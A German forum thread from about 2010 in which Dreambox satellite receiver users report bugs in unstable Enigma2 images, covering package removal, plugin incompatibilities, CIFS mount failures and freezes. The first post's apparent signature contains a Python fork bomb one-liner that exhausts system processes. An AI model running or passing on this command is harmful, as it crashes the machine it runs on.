Sammelthrad für unstable images DM8000/DM800/DM500HD

  • So Mädelz!
    1. Wer Modem gedönse wech haben will

    Quellcode

    1. opkg remove task-opendreambox-modem enigma2-plugin-extensions-modem ppp kernel-module-ppp-async kernel-module-crc-ccitt kernel-module-ppp-deflate kernel-module-ppp-generic kernel-module-slhc


    2. Wer bei der 800er Wlan gedönse wech haben will

    Quellcode

    1. opkg remove task-opendreambox-wlan enigma2-plugin-systemplugins-wirelesslan zd1211b wlan-rt73 wireless-tools wpa-supplicant
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • 500HD Unstable 23.03.10

    Plugin suomipoeka 0.95 manuell installiert, nach Neustart funktionierender Netzzugriff auf NAS nicht mehr möglich gewesen, auch Neuanlegen der Mounts keine Chance.
    Deinstallation/Reboot alles wieder i.O.
  • Original von Kalle
    500HD Unstable 23.03.10

    Plugin suomipoeka 0.95 manuell installiert, nach Neustart funktionierender Netzzugriff auf NAS nicht mehr möglich gewesen, auch Neuanlegen der Mounts keine Chance.
    Deinstallation/Reboot alles wieder i.O.


    woher hattest du den das plugin ?
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Original von Kalle
    Habs mir vom Stable Feed gezogen und per Manueller Inst. eingefügt.


    stable feed plugins funktionieren da nicht

    stable hat python 2.5 und unstable ist 2.6 in vielen plugins fehlen die python files und da liegen im
    2.5 python compilierte *.pyc files bei das neue unstable mit python 2.6 will aber compilierte *.pyo files :(
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • 500 HD Unstable 23.03.10

    Bei ansehen einer .ts-Aufnahme mit dem Media Player von meiner mit Cifs gemounteten 800er hat sich die Box ins Eck gestellt (Bildfreezer mit zucken).
    GUI Neustart über Telnet nicht möglich, nur ein Hard Reset hat geholfen.
    Box aufgestartet, Media Player an, NAS nicht verfügbar, Netzfreigabe überprüft und nochmals aktualisieren lassen, Freigabenachricht war die nächsten 4 Minuten zu sehen, Bild im Hintergrund war noch an.
    Nach erneuten aufstarten, Media Player angewählt -> Zahnrädchen, aber Lautstärke war noch einstellbar.
    Nochmals GUI Neustart über Telnet und erstmal einen Soft Reset verpasst, Box anschließend wieder i.O..

    Kann es vielleicht mit meinem vorher beschriebenen suomipoeka Installationsversuch zu tun haben?

    Merci @Nixkoenner für deine Aufklärung, hab nicht daran gedacht, dass es nicht nur einen neuen Kernel gibt, auch das OE ist ja neu! Muss wohl der Plugin-Autor zur Anpassung ran?
  • Unstable vom 22. 3. 2010 USB Stick wird zwar erkannt als Upper USB Slot Typ ST 4GB, Gerät: sdb, lässt sich aber nicht mounten über Systemwerkzeuge-Devicemanager.
    Stick neu formatiert am Rechner mit Fat 32, USB Slot getauscht aber leider nichts.
  • Unstable 24.03.
    Bei mehreren Cifs Mounts auf den NAS (kann leider nur Cifs) sind nach Reboot die Mounts nicht verfügbar. Mit einem einzeln eingestellten Mount klappts nach Reboot.
  • Unstable 24.03. 500 HD

    Nach umstellen in Recording Paths und Expert-Menü des Aufnahmeverzeichnis bleibt nach der ersten erfolgreichen Umstellung und abermaliger Umstellung das alte Aufnahmeverzeichnis auf dem Movie Button hängen. Aufnahmen funktionieren, nur eben muss man auf den Media Player zurückgreifen.

    In welcher Datei könnte ich das Manuell nachpflegen?
  • Original von Kalle
    Unstable 24.03.
    Bei mehreren Cifs Mounts auf den NAS (kann leider nur Cifs) sind nach Reboot die Mounts nicht verfügbar. Mit einem einzeln eingestellten Mount klappts nach Reboot.


    na dann gib uns mal infos

    wiki.newnigma2.to/index.php/Bootlog

    achja 500hd hat default mässig alles im bootloader an brauchste das nur mit putty machen :D
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Original von nixkoenner
    na dann gib uns mal infos ...


    Dann will ich das hiermit tun ;) Log-File angehängt.

    Sind zwei Durchläufe, ich habe erst nach dem getätigten 2ten Mount die Aufnahme gestartet, anschließend Reboot, Problem da, Mount gelöscht, mit einem Mount Reboot, Laufwerk am Start.
    Dateien
    • Cifsproblem.zip

      (26,67 kB, 566 mal heruntergeladen, zuletzt: )
  • laut dem log mountet die box aber


    [AutoMount.py] U/MOUNTCMD---> mount -t cifs -o rw,iocharset=utf8,rsize=8192,wsize=8192,username=dream,password=xxxx //192.168.0.7/movie /media/net/NASmovie
    [ePopen] command: mount -t cifs -o rw,iocharset=utf8,rsize=8192,wsize=8192,username=dream,password=xxxx //192.168.0.7/movie /media/net/NASmovie


    nur wahrscheinlich zu spät für enigma2 :D
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Original von nixkoenner
    laut dem log mountet die box aber


    [AutoMount.py] U/MOUNTCMD---> mount -t cifs -o rw,iocharset=utf8,rsize=8192,wsize=8192,username=dream,password=xxxx //192.168.0.7/movie /media/net/NASmovie
    [ePopen] command: mount -t cifs -o rw,iocharset=utf8,rsize=8192,wsize=8192,username=dream,password=xxxx //192.168.0.7/movie /media/net/NASmovie


    nur wahrscheinlich zu spät für enigma2 :D


    Also :prost: -Problem zwischen Box und NAS...hmm, kann ich gleich :saufen:
    oder kann ich dem abhilfe schaffen?

    Was mich wundert ist dieser Auszug
    [AutoMount.py] CheckMountPointFinished
    [AutoMount.py] result mount: mounting //192.168.0.7/mukke on /media/net/NASmukke failed: Resource temporarily unavailable

    Weil in dem Log hab ich ja auch einen funktionierenden Mount drin...nachdem ich den anderen rausgeschmissen hab :]
  • Original von Lynsch
    Akutelles Image für die 800er vom 24.03.
    Installiert, Tuner ausgewählt, Senderliste eingefügt dann läuft die Box 30sek. danach Freeze. Jedes mal



    wie bei der 500hd und 8000 bug in den treibern von dmm
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Originally posted by Lynsch
    Akutelles Image für die 800er vom 24.03.
    Installiert, Tuner ausgewählt, Senderliste eingefügt dann läuft die Box 30sek. danach Freeze. Jedes mal


    kann ich nicht nachvollziehen...aktuelles image 24.03 laeuft bei mir ..
    Why drink & Drive ?

    When you can smoke & fly 8)

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dreamedge ()

  • Original von nixkoenner
    Original von Lynsch
    Akutelles Image für die 800er vom 24.03.
    Installiert, Tuner ausgewählt, Senderliste eingefügt dann läuft die Box 30sek. danach Freeze. Jedes mal



    wie bei der 500hd und 8000 bug in den treibern von dmm


    Gibt es die alten Treiber als ipk das man die downgraden kann?
    mfg harry

    Dreambox 8000SS